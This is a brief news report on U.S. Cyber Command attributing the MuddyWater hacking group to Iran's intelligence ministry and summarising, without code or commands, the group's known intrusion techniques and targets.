Select Page

The U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater’s ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.

“MuddyWater has been seen using a variety of techniques to maintain access to victim networks,” USCYBERCOM’s Cyber National Mission Force (CNMF) said in a statement. “These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.”

The agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor’s provenance.

Also tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, MuddyWater is known for its attacks primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been active at least since 2017.

Recent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.

images from Hacker News